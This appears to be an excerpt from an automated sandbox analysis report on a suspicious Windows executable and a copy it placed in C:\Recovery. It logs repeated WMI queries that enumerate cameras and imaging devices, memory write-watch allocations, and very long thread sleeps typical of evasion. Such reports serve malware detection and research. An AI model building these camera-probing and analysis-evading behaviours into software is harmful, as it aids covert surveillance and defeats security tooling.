                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Memory allocated: 13D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Memory allocated: 1B130000 memory reserve | memory write watch
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Memory allocated: 1130000 memory reserve | memory write watch
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Memory allocated: 1ABC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 600000
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599859
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599750
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599641
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599516
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599406
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599297
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599187
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 599078
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 3600000
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598968
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598859
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598750
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598641
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598525
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598406
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598297
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598188
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 598078
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597969
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597859
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597750
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597641
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597531
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597422
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597312
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597203
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 597094
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596984
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596875
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596766
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596656
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596547
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596438
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596313
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596188
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 596063
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595953
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595843
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595734
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595625
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595504
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595375
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595266
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595141
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 595031
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 594922
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 594812
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 594703
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Thread delayed: delay time: 594594
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Window / User API: threadDelayed 1281
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe Window / User API: threadDelayed 8412
Source: C:\Users\user\Desktop\4Osfx7gnSx.exe TID: 3480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 2556 Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599859s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599750s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599641s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599516s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599406s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599297s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599187s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -599078s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 5004 Thread sleep time: -7200000s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598968s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598859s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598750s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598641s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598525s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598406s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598297s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598188s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -598078s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597969s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597859s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597750s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597641s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597531s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597422s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597312s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597203s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -597094s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596984s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596875s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596766s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596656s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596547s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596438s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596313s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596188s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -596063s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595953s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595843s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595734s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595625s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595504s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595375s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595266s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595141s >= -30000s
Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496 Thread sleep time: -595031s >= -30000s
